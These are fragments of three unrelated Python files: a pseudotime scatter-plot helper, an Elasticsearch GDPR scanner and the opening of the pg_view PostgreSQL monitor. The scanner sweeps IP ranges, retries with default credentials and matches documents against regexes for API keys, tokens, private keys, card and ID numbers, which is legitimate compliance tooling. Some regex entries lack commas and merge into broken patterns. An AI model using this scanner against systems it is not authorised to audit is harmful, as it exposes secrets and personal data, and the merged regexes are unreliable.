elif cpt[i] == 3:
color_map[i] = 'blue'
else:
color_map[i] = 'orange'
markers = [plt.Line2D([0,0],[0,0], color=color, marker='o', linestyle='') for color in cellCapture.values()]
# plt.figure(figsize=(5, 5))
ax.scatter(xData, yData, 10, c=color_map)
if diagLine:
ax.plot( [0,0.7],[0,0.7], linewidth=3)
_=plt.xticks(fontsize=14)
_=plt.yticks(fontsize=14)
ax.set_xlabel('BGPLVM Pseudotime', fontsize=16)
ax.set_ylabel('Diffusion Pseudotime', fontsize=16)
ax.set_title(title, fontsize=18)
# plt.title("Correlation (No Prior) = %f"%(spearmanr(pTimes['pt_np_32_trun'].values, pTimes['dpt'].values)[0]), fontsize=20)
# plt.xlabel('BGPLVM', fontsize=20)
# plt.ylabel('DPT', fontsize=20)
# l = plt.legend(markers, cellCapture.keys(), numpoints=1, title='Capture', bbox_to_anchor=(1.15, 0.5), loc=10, fontsize=16)
ax.legend(markers, cellCapture.keys(), numpoints=1, title='Capture', fontsize=14, frameon=False)
# ax.setp(l.get_title(), fontsize=14)
def plot_robustness_across_prior_variance(array_of_values, single_value, title, xlabel, ylabel):
xVals = np.array([0.01, 5, 10, 15, 20, 25, 30, 35, 40, 45, | |
#!/usr/bin/env python
###########################################################
# GDPR scanner, by <NAME>
# see https://github.com/blookot/elastic-gdpr-scanner
###########################################################
# This script requires Python 3!
import sys
MIN_PYTHON = (3, 0)
if sys.version_info < MIN_PYTHON:
sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)
import socket
import subprocess
import sys
import threading
from queue import Queue
import signal
import time
from urllib.request import Request, urlopen, HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener, install_opener
from urllib.error import URLError, HTTPError
import json
import re
import argparse
import ipaddress
# variables and inputs
VERBOSE = False
API_OUTPUT = False
SCAN_FIRST_INDEX_ONLY = False
SCAN_FIRST_PORT_ONLY = False
GDPR_SCAN = False # by default, don't scan (inventory only)
THREAD_TIMEOUT = 240 # timeout per host, in seconds
DEFAULT_TCP_SOCKET_TIMEOUT = 2 # timeout for port scan, in seconds
DEFAULT_NB_THREADS = 10 # nb of targets to scan in parallel
DEFAULT_TARGET = '127.0.0.1'
DEFAULT_PORT = '9200'
DEFAULT_USER = 'elastic'
DEFAULT_PASSWORD = '<PASSWORD>'
DEFAULT_LOG_FILE = 'es-gdpr-report.csv'
HTTP_OK = 0
HTTP_ERROR = -1
HTTP_UNAUTHORIZED = -2
# PII can include driver’s licenses, license plate numbers, VAT codes, heathcare identification numbers, and various other national ID numbers.
# main source: https://ipsec.pl/data-protection/2012/european-personal-data-regexp-patterns.html
# https://github.com/tvfischer/gdpr-data-patterns-detection which is empty...
REGEXES = [
'AIza[0-9A-Za-z-_]{35}',#'google_api'
'6L[0-9A-Za-z-_]{38}|^6[0-9a-zA-Z_-]{39}$',#'google_captcha' : r
'ya29\.[0-9A-Za-z\-_]+',#'google_oauth' : r
'AKIA[0-9A-Z]{16}',#'amazon_aws_access_key_id' : r
'amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', #'amazon_mws_auth_toke' : r
's3\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\.s3\.amazonaws.com',#'amazon_aws_url' : r
'EAACEdEose0cBA[0-9A-Za-z]+',#'facebook_access_token' : r
'basic\s*[a-zA-Z0-9=:_\+\/-]+',#'authorization_basic' : r
'bearer\s*[a-zA-Z0-9_\-\.=:_\+\/]+',#'authorization_bearer' : r
'api[key|\s*]+[a-zA-Z0-9_\-]+',#'authorization_api' : r
'key-[0-9a-zA-Z]{32}',#'mailgun_api_key' : r
'SK[0-9a-fA-F]{32}',#'twilio_api_key' : r
'AC[a-zA-Z0-9_\-]{32}',#'twilio_account_sid' : r
'AP[a-zA-Z0-9_\-]{32}',#'twilio_app_sid' : r
'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}',# 'paypal_braintree_access_token' : r
'sq0csp-[ 0-9A-Za-z\-_]{43}|sq0[a-z]{3}-[0-9A-Za-z\-_]{22,43}',# 'square_oauth_secret' : r
'sqOatp-[0-9A-Za-z\-_]{22}|EAAA[a-zA-Z0-9]{60}',# 'square_access_token' : r
'sk_live_[0-9a-zA-Z]{24}',# 'stripe_standard_api' : r
'rk_live_[0-9a-zA-Z]{24}',# 'stripe_restricted_api' : r
'[a-zA-Z0-9_-]*:[a-zA-Z0-9_\-]+@github\.com*',# 'github_access_token' : r
'-----BEGIN RSA PRIVATE KEY-----',# 'rsa_private_key' : r
'-----BEGIN DSA PRIVATE KEY-----',# 'ssh_dsa_private_key' : r
'-----BEGIN EC PRIVATE KEY-----',# 'ssh_dc_private_key' : r
'-----BEGIN PGP PRIVATE KEY BLOCK-----',# 'pgp_private_block' : r
'ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*$',# 'json_web_token' : r
'^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$', #TEmail addresses <EMAIL>
'\b(?!000|666|9\d{2})([0-8]\d{2}|7([0-6]\d))([-]?|\s{1})(?!00)\d\d\2(?!0000)\d{4}\b', #U.S. Social Security numbers 513-84-7329
'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$', #5MasterCard numbers 258704108753590
'\b([4]\d{3}[\s]\d{4}[\s]\d{4}[\s]\d{4}|[4]\d{3}[-]\d{4}[-]\d{4}[-]\d{4}|[4]\d{3}[.]\d{4}[.]\d{4}[.]\d{4}|[4]\d{3}\d{4}\d{4}\d{4})\b' #visa card number 4563-7568-5698-4587
'^3[47][0-9]{13}$' #American Express card numbers34583547858682157
'^((\d{5}-\d{4})|(\d{5})|([A-Z]\d[A-Z]\s\d[A-Z]\d))$' #.S. ZIP codes97589
'[1,2][ ]?[0-9]{2}[ ]?[0,1,2,3,5][0-9][ ]?[0-9]{2}[ ]?[0-9]{3}[ ]?[0-9]{3}[ ]?[0-9]{2}', # French social security number
'[0-9]{2}[A-Z]{2}[0-9]{5}', # French passport number
'[0-9]{2}[0,1][0-9][0-9]{2}-[A-Z]-[0-9]{5}', # German Personenkennziffer
# '[0-9]{3}/?[0-9]{4}/?[0-9]{4}', # German Steuer-Identifikationsnummer
'[0-9]{2}[0-9]{2}[0,1][0-9][0-9]{2}[A-Z][0-9]{2}[0-9]', # German Versicherungsnummer, Rentenversicherungsnummer
'[0-9,X,M,L,K,Y][0-9]{7}[A-Z]', # Spanish Documento Nacional de Identidad
'[A-CEGHJ-PR-TW-Z][A-CEGHJ-NPR-TW-Z]{1}[0-9]{6}[A-DFM]?', # UK National Identity Number
# '[0-9]{3}[ -]?[0-9]{3}[ -]?[0-9]{4}', # UK national health security number, but matches certain beats!
'[0-9]{2}\.?[0-9]{2}\.?[0-9]{2}-[0-9]{3}\.?[0-9]{2}', # Belgium ID
'[A-Z]{2}?[ ]?[0-9]{2}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}[ ]?[0-9]{4}', # EU IBAN
'(?:https?:)?\\/\\/angel\\.co\\/company\\/(?P<company>[A-z0-9_-]+)(?:\\/(?P<company_subpage>[A-z0-9-]+))?',
'(?:https?:)?\\/\\/angel\\.co\\/company\\/(?P<company>[A-z0-9_-]+)\\/jobs\\/(?P<job_permalink>(?P<job_id>[0-9]+)-(?P<job_slug>[A-z0-9-]+))',
'(?:https?:)?\\/\\/angel\\.co\\/(?P<type>u|p)\\/(?P<user>[A-z0-9_-]+)',
'mailto:(?P<email>[A-z0-9_.+-]+@[A-z0-9_.-]+\\.[A-z]+)',
'(?:https?:)?\\/\\/(?:www\\.)?(?:facebook|fb)\\.com\\/(?P<profile>(?![A-z]+\\.php)(?!marketplace|gaming|watch|me|messages|help|search|groups)[A-z0-9_\\-\\.]+)\\/?',
'(?:https?:)?\\/\\/(?:www\\.)facebook.com/(?:profile.php\\?id=)?(?P<id>[0-9]+)',
'(?:https?:)?\\/\\/(?:www\\.)?github\\.com\\/(?P<login>[A-z0-9_-]+)\\/(?P<repo>[A-z0-9_-]+)\\/?',
'(?:https?:)?\\/\\/(?:www\\.)?github\\.com\\/(?P<login>[A-z0-9_-]+)\\/?',
'(?:https?:)?\\/\\/plus\\.google\\.com\\/(?P<id>[0-9]{21})',
'(?:https?:)?\\/\\/plus\\.google\\.com\\/\\+(?P<username>[A-z0-9+]+)',
'(?:https?:)?\\/\\/news\\.ycombinator\\.com\\/item\\?id=(?P<item>[0-9]+)',
'(?:https?:)?\\/\\/news\\.ycombinator\\.com\\/user\\?id=(?P<user>[A-z0-9_-]+)',
'(?:https?:)?\\/\\/(?:www\\.)?(?:instagram\\.com|instagr\\.am)\\/(?P<username>[A-Za-z0-9_](?:(?:[A-Za-z0-9_]|(?:\\.(?!\\.))){0,28}(?:[A-Za-z0-9_]))?)',
'(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/company\\/(?P<company_permalink>[A-z0-9-\\.]+)\\/?',
'(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/feed\\/update\\/urn:li:activity:(?P<activity_id>[0-9]+)\\/?',
'(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/in\\/(?P<permalink>[\\w\\-\\_\u00c0-\u00ff%]+)\\/?',
'(?:https?:)?\\/\\/(?:[\\w]+\\.)?linkedin\\.com\\/pub\\/(?P<permalink_pub>[A-z0-9_-]+)(?:\\/[A-z0-9]+){3}\\/?',
'(?:https?:)?\\/\\/medium\\.com\\/(?:(?:@(?P<username>[A-z0-9]+))|(?P<publication>[a-z-]+))\\/(?P<slug>[a-z0-9\\-]+)-(?P<post_id>[A-z0-9]+)(?:\\?.*)?',
'(?:https?:)?\\/\\/(?P<publication>(?!www)[a-z-]+)\\.medium\\.com\\/(?P<slug>[a-z0-9\\-]+)-(?P<post_id>[A-z0-9]+)(?:\\?.*)?',
'(?:https?:)?\\/\\/medium\\.com\\/@(?P<username>[A-z0-9]+)(?:\\?.*)?',
'(?:https?:)?\\/\\/medium\\.com\\/u\\/(?P<user_id>[A-z0-9]+)(?:\\?.*)',
'(?:tel|phone|mobile):(?P<number>\\+?[0-9. -]+)',
'(?:https?:)?\\/\\/(?:[a-z]+\\.)?reddit\\.com\\/(?:u(?:ser)?)\\/(?P<username>[A-z0-9\\-\\_]*)\\/?',
'(?:(?:callto|skype):)(?P<username>[a-z][a-z0-9\\.,\\-_]{5,31})(?:\\?(?:add|call|chat|sendfile|userinfo))?',
'(?:https?:)?\\/\\/(?:www\\.)?snapchat\\.com\\/add\\/(?P<username>[A-z0-9\\.\\_\\-]+)\\/?',
'(?:https?:)?\\/\\/(?:www\\.)?stackexchange\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
'(?:https?:)?\\/\\/(?:(?P<community>[a-z]+(?!www))\\.)?stackexchange\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
'(?:https?:)?\\/\\/(?:www\\.)?stackoverflow\\.com\\/questions\\/(?P<id>[0-9]+)\\/(?P<title>[A-z0-9-_.]+)\\/?',
'(?:https?:)?\\/\\/(?:www\\.)?stackoverflow\\.com\\/users\\/(?P<id>[0-9]+)\\/(?P<username>[A-z0-9-_.]+)\\/?',
'(?:https?:)?\\/\\/(?:t(?:elegram)?\\.me|telegram\\.org)\\/(?P<username>[a-z0-9\\_]{5,32})\\/?',
'(?:https?:)?\\/\\/(?:[A-z]+\\.)?twitter\\.com\\/@?(?P<username>[A-z0-9_]+)\\/status\\/(?P<tweet_id>[0-9]+)\\/?',
'(?:https?:)?\\/\\/(?:[A-z]+\\.)?twitter\\.com\\/@?(?P<username>[A-z0-9_]+)\\/?',
'(?:https?:)?\\/\\/vimeo\\.com\\/user(?P<id>[0-9]+)',
'(?:https?:)?\\/\\/(?:(?:www)?vimeo\\.com|player.vimeo.com\\/video)\\/(?P<id>[0-9]+)',
'(?:https?:)?\\/\\/(?:[A-z]+\\.)?youtube.com\\/channel\\/(?P<id>[A-z0-9-\\_]+)\\/?',
'(?:https?:)?\\/\\/(?:[A-z]+\\.)?youtube.com\\/user\\/(?P<username>[A-z0-9]+)\\/?',
'(?:https?:)?\\/\\/(?:(?:www\\.)?youtube\\.com\\/(?:watch\\?v=|embed\\/)|youtu\\.be\\/)(?P<id>[A-z0-9\\-\\_]+)',
]
# a print_lock is what is used to prevent "double" modification of shared variables.
# this is used so while one thread is using a variable, others cannot access
# it. Once done, the thread releases the print_lock.
# to use it, you want to specify a print_lock per thing you wish to print_lock.
print_lock = threading.Lock()
start_time = time.time()
# handle Ctrl-C to stop
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# main scanning function
def portscan(hostname):
ip = socket.gethostbyname(hostname)
for port in PORTS:
if VERBOSE:
print ("** DEBUG ** Scanning Host: {}, Port {}".format(ip,port))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(float(TCP_SOCKET_TIMEOUT))
s.connect((ip,int(port)))
s.close()
except socket.gaierror:
print ('Hostname could not be resolved. Exiting')
# pass
except socket.error:
print ("Host: {}, Port {}: Closed".format(ip,port))
# pass
else:
if VERBOSE:
print ("Host: {}, Port {}: Open".format(ip,port))
# Try getting ES answer
# first try http with no authentication
auth = False
proto = 'http'
encr = False
res = runRequest(proto,hostname,port,'',auth)
if res['code'] == HTTP_ERROR:
# now try with https
proto = 'https'
encr = True
res = runRequest(proto,hostname,port,'',auth)
# if we need auth, try again with auth
if res['code'] == HTTP_UNAUTHORIZED:
# auth in place, retry with auth
auth = True
res = runRequest(proto,hostname,port,'',auth)
if res['code'] == HTTP_OK:
esAnswer = res['content']
if 'cluster_name' in esAnswer:
clusterName = esAnswer['cluster_name']
else:
clusterName = "null"
if 'name' in esAnswer:
name = esAnswer['name']
else:
name = "null"
if 'version' in esAnswer:
if 'number' in esAnswer['version']:
versionNumber = esAnswer['version']['number']
else:
versionNumber = 'null'
else:
versionNumber = 'null'
# then grab stats on node from /_stats/docs,store
res = runRequest(proto,hostname,port,'/_stats/docs,store',auth)
if res['code'] == HTTP_OK:
esAnswer = res['content']
if '_all' in esAnswer:
if 'total' in esAnswer['_all']:
totalDocs = esAnswer['_all']['total']['docs']['count']
totalSize = int(int(esAnswer['_all']['total']['store']['size_in_bytes'])/(1024*1024))
else:
totalDocs = 'null'
totalSize = 'null'
else:
totalDocs = 'null'
totalSize = 'null'
print ("Found Host: {}, Port: {}, Encrypted: {}, Authenticated: {}, Cluster name: {}, Name: {}, Version: {}, Total number of docs: {}, Total size (MB): {}".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize))
logFile.write("{},{},{},{},{},{},{},{},{}\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize))
if GDPR_SCAN:
# then explore indices
# /_cat/indices introduced in 1.3, not working on v0.90 (thus relying on node stats...)
if 'indices' in esAnswer:
for index, indexDetails in iter(esAnswer['indices'].items()):
if VERBOSE:
print ("** Testing index {}".format(index))
# consider non-internal indices
if index[:1] != '.':
# grab index stats
# print (json.dumps(data, sort_keys=True, indent=4, separators=(',', ': ')))
indexNbDocs = indexDetails['total']['docs']['count']
indexSize = int(int(indexDetails['total']['store']['size_in_bytes'])/(1024*1024))
# then get first doc : /[index]/_search?size=1
res = runRequest(proto,hostname,port,index+"/_search?size=1",auth)
if res['code'] == HTTP_OK:
esDocs = res['content']
# check if at least 1 document
if esDocs['hits']['total'] == 0:
if VERBOSE:
print ("No document found in index "+index)
logFile.write("{},{},{},{},{},{},{},{},{},{},{},{},N/A (no doc)\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize, index, indexNbDocs, indexSize))
else:
# get source doc
try:
source = esDocs['hits']['hits'][0]['_source']
except:
print ('Couldn\'t get document from index '+index)
else:
# check for compliance calling regex checker func (outputs true when regex match, ie *not* compliant)
rgpdCheck = regex_checker(source)
if VERBOSE:
print ('** Testing index {}, result: {}'.format(index, rgpdCheck['result']))
else:
if rgpdCheck['result']:
# display uncompliant indices even if not verbose
print ("** Host: {}, Port: {}, Encrypted: {}, Authenticated: {}, Cluster name: {}, Name: {}, Version: {} - Index {} not compliant! (value '{}' matched regex '{}')".format(ip, port, encr, auth, clusterName, name, versionNumber, index, rgpdCheck['value'], rgpdCheck['regex']))
# log in file anyway
logFile.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\r\n".format(ip, port, encr, auth, clusterName, name, versionNumber, totalDocs, totalSize, index, indexNbDocs, indexSize, not(rgpdCheck['result']), rgpdCheck['value'], rgpdCheck['regex']))
# scan only first index to go faster
if SCAN_FIRST_INDEX_ONLY:
break
# indices listing didn't work
else:
print ('Couldn\'t list indices')
else:
print ("Found Host: {}, Port {}, Encrypted: {}, Authenticated: {}".format(ip, port, encr, auth))
logFile.write("{},{},{},{}\r\n".format(ip, port, encr, auth))
# scan first port only
if SCAN_FIRST_PORT_ONLY:
break
# regex checker func (outputs true when regex match, ie outputs true when *not* compliant)
def regex_checker(jsonDoc):
print ('Testing: '+json.dumps(jsonDoc))
#print ('Testing: '+json.dumps(jsonDoc))
for key, value in iter(jsonDoc.items()):
if isinstance(value, str):
for r in REGEXES:
check = bool(re.search(r, value))
if VERBOSE:
print ('\tCheck '+value+' against regex \''+r+'\': '+str(check))
if check:
return {"result":True, "value":value, "regex":r}
elif isinstance(value,dict):
return regex_checker(value)
return {"result":False, "value":"", "regex":""}
# sub function just running the GET
def runRequest(proto,host,port,query,auth):
res = { 'code': HTTP_ERROR, 'encrypted': True, 'authenticated': True, 'content': ''}
res['encrypted'] = (proto == 'https')
res['authenticated'] = auth
url = proto + '://' + host + ':' + port + '/' + query
if VERBOSE:
print ("Calling query {}".format(url))
if auth:
# create an authorization handler for basic auth on Elasticsearch
p = HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, url, USER, PASSWORD)
auth_handler = HTTPBasicAuthHandler(p)
opener = build_opener(auth_handler)
install_opener(opener)
# add headers
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
try:
# run request
req = Request(url,headers=headers)
r = urlopen(req)
except HTTPError as e:
if VERBOSE:
print('Error HTTPError: '+str(e))
if str(e).find('Unauthorized') > 0:
res['code'] = HTTP_UNAUTHORIZED
return res
except URLError as e:
if VERBOSE:
print('Error URLError: '+str(e))
return res
except Exception as e:
if VERBOSE:
print('Error: '+str(e))
return res
except:
print("Unexpected error:", sys.exc_info()[0])
raise
else:
try:
if r.code == 200:
content = json.loads(r.read().decode('utf-8'))
if API_OUTPUT:
print (json.dumps(content, sort_keys=True, indent=4, separators=(',', ': ')))
res['code'] = HTTP_OK
res['content'] = content
return res
else:
return res
except Exception as e:
if VERBOSE:
print('Error: '+str(e))
return res
except:
print("Unexpected error:", sys.exc_info()[0])
raise
# Getting arguments
parser = argparse.ArgumentParser(description='Scan Elasticsearch clusters to check for GDPR compliance.')
parser.add_argument('--target', action='store', default='', help='Hostname or IP range (CIDR format, eg 10.50.3.0/24) to scan (default: localhost)')
parser.add_argument('--port', action='store', default='', help='Port where Elasticsearch is running (default: 9200)')
parser.add_argument('--user', action='store', default='', help='Username to use to authenticate to Elasticsearch (default: elastic)')
parser.add_argument('--password', action='store', default='', help='Username to use to authenticate to Elasticsearch (default: changeme)')
parser.add_argument('--regex', action='store', default='', help='Specific regex to look for')
parser.add_argument('--nb-threads', action='store', default='', dest='nbthreads', help='Number of hosts to scan in parallel (default: 10)')
parser.add_argument('--socket-timeout', action='store', default='', dest='stimeout', help='Seconds to wait for each host/port scanned. Set it to 2 on the Internet, 0.5 in local networks (default: 2)')
parser.add_argument('--run-scan', action='store_true', default=False, dest='scan', help='Run scan for GDPR data (based on regex matching)')
parser.add_argument('--out', action='store', default='', help='Log file with verbose output (default: es-gdpr-report.csv)')
parser.add_argument('--verbose', action='store_true', | |
<reponame>pshen/pg_view<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import glob
import logging
from optparse import OptionParser
from operator import itemgetter
from datetime import datetime, timedelta
from numbers import Number
from multiprocessing import Process, JoinableQueue, cpu_count # for then number of cpus
import platform
import resource
import socket
import subprocess
import time
import traceback
import json
from collections import namedtuple
__appname__ = 'pg_view'
__version__ = '1.3.0'
__author__ = '<NAME> <<EMAIL>>'
__license__ = 'Apache 2.0'
if sys.hexversion >= 0x03000000:
import configparser as ConfigParser
from queue import Empty
long = int
maxsize = sys.maxsize
else:
import ConfigParser
from Queue import Empty
maxsize = sys.maxint
try:
import psycopg2
import psycopg2.extras
psycopg2_available = True
except ImportError:
psycopg2_available = False
try:
import curses
curses_available = True
except ImportError:
print('Unable to import ncurses, curses output will be unavailable')
curses_available = False
# enum emulation
def enum(**enums):
return type('Enum', (), enums)
class ColumnType(namedtuple('ColumnType', 'value header header_position')):
__slots__ = ()
@property
def length(self):
return len(self.value) + (0 if not self.header_position else len(self.header) + 1)
COLSTATUS = enum(cs_ok=0, cs_warning=1, cs_critical=2)
COLALIGN = enum(ca_none=0, ca_left=1, ca_center=2, ca_right=3)
COLTYPES = enum(ct_string=0, ct_number=1)
COLHEADER = enum(ch_default=0, ch_prepend=1, ch_append=2)
OUTPUT_METHOD = enum(console='console', json='json', curses='curses')
STAT_FIELD = enum(st_pid=0, st_process_name=1, st_state=2, st_ppid=3, st_start_time=21)
BLOCK_SIZE = 1024
MEM_PAGE_SIZE = resource.getpagesize()
# some global variables for keyboard output
freeze = False
filter_aux = True
autohide_fields = False
display_units = False
notrim = False
realtime = False
# validation functions for OUTPUT_METHOD
def get_valid_output_methods():
result = []
for key in OUTPUT_METHOD.__dict__.keys():
if re.match(r'^[a-z][a-z_]+$', key):
value = OUTPUT_METHOD.__dict__[key]
result.append(value)
return result
def output_method_is_valid(method):
'''
>>> output_method_is_valid('foo')
False
>>> output_method_is_valid('curses')
True
'''
return method in get_valid_output_methods()
def parse_args():
'''parse command-line options'''
parser = OptionParser(add_help_option=False)
parser.add_option('-H', '--help', help='show_help', action='help')
parser.add_option('-v', '--verbose', help='verbose mode', action='store_true', dest='verbose')
parser.add_option('-i', '--instance', help='name of the instance to monitor', action='store', dest='instance')
parser.add_option('-t', '--tick', help='tick length (in seconds)',
action='store', dest='tick', type='int', default=1)
parser.add_option('-o', '--output-method', help='send output to the following source', action='store',
default=OUTPUT_METHOD.curses, dest='output_method')
parser.add_option('-V', '--use-version',
help='version of the instance to monitor (in case it can\'t be autodetected)',
action='store', dest='version', type='float')
parser.add_option('-l', '--log-file', help='direct log output to the file', action='store',
dest='log_file')
parser.add_option('-R', '--reset-output', help='clear screen after each tick', action='store_true', default=False,
dest='clear_screen')
parser.add_option('-c', '--configuration-file', help='configuration file for PostgreSQL connections',
action='store', default='', dest='config_file')
parser.add_option('-P', '--pid', help='always track a given pid (may be used multiple times)',
action='append', type=int, default=[])
parser.add_option('-U', '--username', help='database user name',
action='store', dest='username')
parser.add_option('-d', '--dbname', help='database name to connect to',
action='store', dest='dbname')
parser.add_option('-h', '--host', help='database connection host '
'(or a directory path for the unix socket connection)',
action='store', dest='host')
parser.add_option('-p', '--port', help='database port number', action='store', dest='port')
options, args = parser.parse_args()
return options, args
# setup system constants
TICK_LENGTH = 1
output_method = OUTPUT_METHOD.curses
options = None
logger = None
class StatCollector(object):
""" Generic class to store abstract function and data required to collect system statistics,
produce diffs and emit output rows.
"""
BYTE_MAP = [('TB', 1073741824), ('GB', 1048576), ('MB', 1024)]
USER_HZ = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
RD = 1
NCURSES_DEFAULTS = {
'pos': -1,
'noautohide': False,
'w': 0,
'align': COLALIGN.ca_none,
'column_header': COLHEADER.ch_default,
}
NCURSES_CUSTOM_OUTPUT_FIELDS = ['header', 'prefix', 'prepend_column_headers']
def __init__(self, ticks_per_refresh=1, produce_diffs=True):
self.rows_prev = []
self.rows_cur = []
self.time_diff = 0
self.rows_diff = []
self.ticks = 0
self.ticks_per_refresh = ticks_per_refresh
self.diff_time = 0
self._previous_moment = None
self._current_moment = None
self.produce_diffs = produce_diffs
self.show_units = False
self.ignore_autohide = True
self.notrim = False
# transformation data
self.transform_dict_data = {} # data to transform a dictionary input to the stat row
self.transform_list_data = {} # ditto for the list input
# diff calculation data
self.diff_generator_data = {} # data to produce a diff row out of 2 input ones.
self.output_transform_data = {} # data to transform diff output
self.output_function = {OUTPUT_METHOD.console: self.console_output, OUTPUT_METHOD.json: self.json_output,
OUTPUT_METHOD.curses: self.ncurses_output}
self.cook_function = {OUTPUT_METHOD.curses: self.curses_cook_value}
self.ncurses_custom_fields = dict.fromkeys(StatCollector.NCURSES_CUSTOM_OUTPUT_FIELDS, None)
def postinit(self):
for l in [self.transform_list_data, self.transform_dict_data, self.diff_generator_data,
self.output_transform_data]:
self.validate_list_out(l)
self.output_column_positions = self._calculate_output_column_positions()
def set_ignore_autohide(self, new_status):
self.ignore_autohide = new_status
def set_notrim(self, val):
self.notrim = val
def _calculate_output_column_positions(self):
result = {}
for idx, col in enumerate(self.output_transform_data):
result[col['out']] = idx
return result
def enumerate_output_methods(self):
return self.output_function.keys()
@staticmethod
def exec_command_with_output(cmdline):
""" Execute comand (including shell ones), return a tuple with error code (1 element) and output (rest) """
proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
ret = proc.wait()
if ret != 0:
logger.info('The command {cmd} returned a non-zero exit code'.format(cmd=cmdline))
return ret, proc.stdout.read().strip()
@staticmethod
def validate_list_out(l):
""" If the list element doesn't supply an out column - remove it """
for col in l:
if 'out' not in col:
el = l.pop(l.index(col))
logger.error('Removed {0} column because it did not specify out value'.format(el))
@staticmethod
def ticks_to_seconds(tick_value_str):
return (float(tick_value_str) / StatCollector.USER_HZ if tick_value_str is not None else None)
@staticmethod
def bytes_to_mbytes(bytes_val):
return (float(bytes_val) / 1048576 if bytes_val is not None else None)
@staticmethod
def sectors_to_mbytes(sectors):
return (float(sectors) / 2048 if sectors is not None else None)
@staticmethod
def kb_to_mbytes(kb):
return (float(kb) / 1024 if kb is not None else None)
@staticmethod
def time_diff_to_percent(timediff_val):
return (float(timediff_val) * 100 if timediff_val is not None else None)
@staticmethod
def format_date_from_epoch(epoch_val):
lt = time.localtime(epoch_val)
today = time.localtime()
time_format_str = '%H:%M:%S'
if lt.tm_year != today.tm_year or lt.tm_mon != today.tm_mon or lt.tm_mday != today.tm_mday:
# only show minutes and seconds
time_format_str = '%m-%d %H:%M:%S'
# show full date
return time.strftime(time_format_str, time.localtime(epoch_val))
@staticmethod
def kb_pretty_print_long(b):
""" Show kb values in a human readable form. """
r = []
for l, n in StatCollector.BYTE_MAP:
d = b / n
if d:
r.append(str(d) + l)
b = b % n
return ' '.join(r)
@staticmethod
def kb_pretty_print(b):
""" Show memory size as a float value in the biggest measurement units """
r = []
v = 0
for l, n in StatCollector.BYTE_MAP:
if b > n:
v = round(float(b) / n, 1)
r.append(str(v) + l)
break
if len(r) == 0:
return '{0}KB'.format(str(b))
else:
return ' '.join(r)
@staticmethod
def time_interval_pretty_print(start_time, is_delta):
'''Returns a human readable string that shows a time between now and the timestamp passed as an argument.
The passed argument can be a timestamp (returned by time.time() call) a datetime object or a timedelta object.
In case it is a timedelta object, then it is formatted only
'''
if isinstance(start_time, Number):
if is_delta:
delta = timedelta(seconds=int(time.time() - start_time))
else:
delta = timedelta(seconds=start_time)
elif isinstance(start_time, datetime):
if is_delta:
delta = datetime.now() - start_time
else:
delta = start_time
elif isinstance(start_time, timedelta):
delta = start_time
else:
raise ValueError('passed value should be either a number of seconds ' +
'from year 1970 or datetime instance of timedelta instance')
delta = abs(delta)
secs = delta.seconds
mins = int(secs / 60)
secs %= 60
hrs = int(mins / 60)
mins %= 60
hrs %= 24
result = ''
if delta.days:
result += str(delta.days) + 'd'
if hrs:
if hrs < 10:
result += '0'
result += str(hrs)
result += ':'
if mins < 10:
result += '0'
result += str(mins)
result += ':'
if secs < 10:
result += '0'
result += str(secs)
if not result:
result = str(int(delta.microseconds / 1000)) + 'ms'
return result
@staticmethod
def time_pretty_print(start_time):
return StatCollector.time_interval_pretty_print(start_time, False)
@staticmethod
def delta_pretty_print(start_time):
return StatCollector.time_interval_pretty_print(start_time, True)
@staticmethod
def sectors_pretty_print(b):
return StatCollector.kb_pretty_print(b * 2)
@staticmethod
def int_lower_than_non_zero(row, col, val, bound):
return val > 0 and val < bound
@staticmethod
def time_field_to_seconds(val):
result = 0
num = 0
accum_digits = []
semicolons_no = val.count(':')
for c in val:
if c.isdigit():
accum_digits.append(c)
else:
if len(accum_digits) > 0:
num = int(''.join(accum_digits))
if c == 'd':
num *= 86400
elif c == ':':
num *= 60 ** semicolons_no
semicolons_no -= 1
result += num
num = 0
accum_digits = []
return result
def time_field_status(self, row, col):
val = row[self.output_column_positions[col['out']]]
num = StatCollector.time_field_to_seconds(val)
if num <= col['critical']:
return {-1: COLSTATUS.cs_critical}
elif num <= col['warning']:
return {-1: COLSTATUS.cs_warning}
return {-1: COLSTATUS.cs_ok}
@staticmethod
def warn_non_optional_column(colname):
logger.error('Column {0} is not optional, but input row has no value for it'.format(colname))
def set_units_display(self, status):
self.show_units = status
def needs_diffs(self):
""" whether the collector needs diffs. It might not if it's not interested in them,
or if it doesn't have data to produce them yet.
"""
